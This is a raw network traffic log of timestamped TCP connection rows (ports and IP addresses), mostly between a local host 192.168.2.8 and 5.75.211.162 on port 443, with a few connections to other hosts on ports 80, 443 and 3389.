Sep 27, 2024 01:50:35.380623102 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.384247065 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.384269953 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.384345055 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.384357929 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.384423018 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.399755955 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.399776936 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.399882078 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.399914026 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.399991035 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.405145884 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.405169964 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.405241013 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.405258894 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.405275106 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.406722069 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.417526960 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.417548895 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.417659998 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.417690039 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.417705059 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.417871952 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.436165094 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.436197042 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.436269045 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.436300039 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.436316013 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.438711882 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.450723886 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.450757027 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.450844049 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.450874090 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.450920105 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.454706907 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.463845968 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.463891029 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.463937998 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.463967085 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.463990927 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.464013100 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.472819090 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.472868919 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.472927094 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.472955942 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.472975016 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.474556923 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.474781036 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.474823952 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.474874020 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.474890947 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.474920034 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.474946022 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.490408897 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.490449905 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.490480900 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.490511894 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.490528107 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.490556002 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.495788097 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.495831013 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.495874882 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.495903015 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.495923042 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.495965958 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.508414030 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.508476973 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.508510113 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.508537054 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.508567095 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.508575916 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.526855946 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.526900053 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.526942968 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.526976109 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.526992083 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.527211905 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.530241013 CEST	49764	3389	192.168.2.8	8.46.123.33
Sep 27, 2024 01:50:35.536983967 CEST	3389	49764	8.46.123.33	192.168.2.8
Sep 27, 2024 01:50:35.537054062 CEST	49764	3389	192.168.2.8	8.46.123.33
Sep 27, 2024 01:50:35.537373066 CEST	49764	3389	192.168.2.8	8.46.123.33
Sep 27, 2024 01:50:35.539146900 CEST	49763	80	192.168.2.8	104.26.12.205
Sep 27, 2024 01:50:35.541351080 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.541394949 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.541433096 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.541464090 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.541484118 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.541512966 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.542522907 CEST	3389	49764	8.46.123.33	192.168.2.8
Sep 27, 2024 01:50:35.542601109 CEST	49764	3389	192.168.2.8	8.46.123.33
Sep 27, 2024 01:50:35.546196938 CEST	80	49763	104.26.12.205	192.168.2.8
Sep 27, 2024 01:50:35.554195881 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.554239988 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.554291010 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.554322004 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.554342031 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.554601908 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.573633909 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.573681116 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.573740005 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.573784113 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.573806047 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.573858976 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.574120045 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.574177027 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.574220896 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.574232101 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.574259043 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.574280977 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.585160017 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.585201025 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.585263014 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.585304022 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.585324049 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.585351944 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.589270115 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.589310884 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.589345932 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.589375973 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.589394093 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.589425087 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.599026918 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.599078894 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.599114895 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.599159002 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.599179029 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.599203110 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.617461920 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.617505074 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.617537975 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.617572069 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.617593050 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.617614031 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.631776094 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.631818056 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.631851912 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.631880999 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.631901026 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.631927013 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.645970106 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.646011114 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.646053076 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.646080971 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.646105051 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.646126032 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.655880928 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.655957937 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.655977011 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.656006098 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.656040907 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.656052113 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.659545898 CEST	80	49763	104.26.12.205	192.168.2.8
Sep 27, 2024 01:50:35.660064936 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.660109043 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.660142899 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.660168886 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.660198927 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.660217047 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.675525904 CEST	49765	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:50:35.675565958 CEST	443	49765	188.114.96.3	192.168.2.8
Sep 27, 2024 01:50:35.675750971 CEST	49765	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:50:35.687131882 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.687190056 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.687230110 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.687272072 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.687293053 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.687442064 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.688581944 CEST	49765	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:50:35.688608885 CEST	443	49765	188.114.96.3	192.168.2.8
Sep 27, 2024 01:50:35.690407991 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.690429926 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.690489054 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.690516949 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.690534115 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.690563917 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.700223923 CEST	49763	80	192.168.2.8	104.26.12.205
Sep 27, 2024 01:50:35.701260090 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.701282024 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.701354027 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.701380968 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.701400042 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.701435089 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.707984924 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.708005905 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.708065033 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.708090067 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.708110094 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.708153009 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.722482920 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.722505093 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.722559929 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.722587109 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.722608089 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.722630024 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.736776114 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.736825943 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.736875057 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.736901999 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.736918926 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.737803936 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.749984026 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.750027895 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.750061989 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.750089884 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.750121117 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.750142097 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.750605106 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.750653982 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.750691891 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.750710964 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.750742912 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.750766039 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.777853012 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.777908087 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.778007984 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.778057098 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.778085947 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.778587103 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.781337023 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.781378984 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.781420946 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.781433105 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.781609058 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.781609058 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.792488098 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.792530060 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.792649984 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.792679071 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.792769909 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.798947096 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.798990965 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.799103975 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.799153090 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.799276114 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.813400030 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.813441992 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.813679934 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.813755989 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.813946009 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.827518940 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.827560902 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.827601910 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.827627897 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.827656984 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.827682018 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.840878963 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.840922117 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.841198921 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.841258049 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.841337919 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.841367006 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.841376066 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.841399908 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.841403961 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.841448069 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.841455936 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.841561079 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.868446112 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.868504047 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.868587017 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.868616104 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.868634939 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.868673086 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.871952057 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.872018099 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.872109890 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.872133970 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.872215986 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.882911921 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.882955074 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.883138895 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.883157969 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.883213043 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.889663935 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.889720917 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.889822960 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.889851093 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.889925003 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.904355049 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.904398918 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.904531956 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.904612064 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.904680014 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.904768944 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.918143988 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.918184996 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.918284893 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.918311119 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.918354988 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.931494951 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.931540012 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.931735992 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.931799889 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.931830883 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.931880951 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.931896925 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.931919098 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.932029009 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.959187984 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.959254980 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.959273100 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.959306955 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.959326029 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.959352016 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.962905884 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.962951899 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.963057041 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.963090897 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.963135004 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.963171005 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.973659039 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.973702908 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.973737955 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.973768950 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.973784924 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.973817110 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.980459929 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.980506897 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.980539083 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.980566978 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.980582952 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.980611086 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.994882107 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.994925022 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.994954109 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.994982958 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:35.994997978 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:35.995026112 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.008708954 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.008755922 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.008775949 CEST	49762	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:50:36.008800983 CEST	443	49762	5.75.211.162	192.168.2.8
Sep 27, 2024 01:50:36.008821964 CEST	49762	443	192.168.2.8	5.75.211.162
